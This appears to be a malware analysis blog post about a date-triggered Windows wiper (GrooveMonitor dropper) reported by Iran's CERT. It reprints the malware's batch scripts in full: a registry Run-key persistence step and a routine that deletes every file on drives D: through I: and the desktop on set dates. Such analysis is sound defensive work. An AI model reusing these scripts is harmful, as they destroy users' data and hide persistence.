A few days ago, The Iranian CERT (Maher Center) released information about a new identified targeted malware with wiping capabilities. The piece of code is very simple and it deletes files on different drives on specific dates.
The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:
WINDOWSsystem32SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37
WINDOWSsystem32jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6
WINDOWSsystem32juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41
The juboot.exe is executed. The following bat file is created and executed:
Documents and Settings%User%Local SettingsTemp.tmpjuboot.bat
@echo off & setlocal
sleep for 2
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d “%systemroot%system32jucheck.exe” /f
start “” /D”%systemroot%system32” “jucheck.exe”
As you can see the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence executing the jucheck.exe file everytime the system boots.
Then jucheck.exe is executed that creates the file Documents and SettingsAdministratorLocal SettingsTemp.tmpjucheck.bat:
@echo off & setlocal
sleep for 2
del “%systemroot%system32juboot.exe” /q /s /f
del “%userprofile%Start MenuProgramsStartupGrooveMonitor.exe” /q /s /f
if “%date%”==“Mon 12/10/2012” goto yes
if “%date%”==“Tue 12/11/2012” goto yes
if “%date%”==“Wed 12/12/2012” goto yes
if “%date%”==“Mon 01/21/2013” goto yes
if “%date%”==“Tue 01/22/2013” goto yes
if “%date%”==“Wed 01/23/2013” goto yes
if “%date%”==“Mon 05/06/2013” goto yes
if “%date%”==“Tue 05/07/2013” goto yes
if “%date%”==“Wed 05/08/2013” goto yes
if “%date%”==“Mon 07/22/2013” goto yes
if “%date%”==“Tue 07/23/2013” goto yes
if “%date%”==“Wed 07/24/2013” goto yes
if “%date%”==“Mon 11/11/2013” goto yes
if “%date%”==“Tue 11/12/2013” goto yes
if “%date%”==“Wed 11/13/2013” goto yes
if “%date%”==“Mon 02/03/2014” goto yes
if “%date%”==“Tue 02/04/2014” goto yes
if “%date%”==“Wed 02/05/2014” goto yes
if “%date%”==“Mon 05/05/2014” goto yes
if “%date%”==“Tue 05/06/2014” goto yes
if “%date%”==“Wed 05/07/2014” goto yes
if “%date%”==“Mon 08/11/2014” goto yes
if “%date%”==“Tue 08/12/2014” goto yes
if “%date%”==“Wed 08/13/2014” goto yes
if “%date%”==“Mon 02/02/2015” goto yes
if “%date%”==“Tue 02/03/2015” goto yes
if “%date%”==“Wed 02/04/2015” goto yes
goto no
:yes
sleep for 3000
IF EXIST d: del “d:*.*” /q /s /f
IF EXIST d: Chkdsk d:
IF EXIST e: del “e:*.*” /q /s /f
IF EXIST e: Chkdsk e:
IF EXIST f: del “f:*.*” /q /s /f
IF EXIST f: Chkdsk f:
IF EXIST g: del “g:*.*” /q /s /f
IF EXIST g: Chkdsk g:
IF EXIST h: del “h:*.*” /q /s /f
IF EXIST h: Chkdsk h:
IF EXIST i: del “i:*.*” /q /s /f
IF EXIST i: Chkdsk i:
del “%userprofile%Desktop*.*” /q /s /f
\start calc
:no
As you can see when the bat file is executed, the juboot.exe file is deleted as well as the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the bat files checks the system date and if it matches one of the predefined dates it executes the wiping routine. This routine checks for system drives and it then deletes every file on those drives. Finally it deletes the userprofile folder.
We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.
We have built some OpenIOC indicators that you can access here.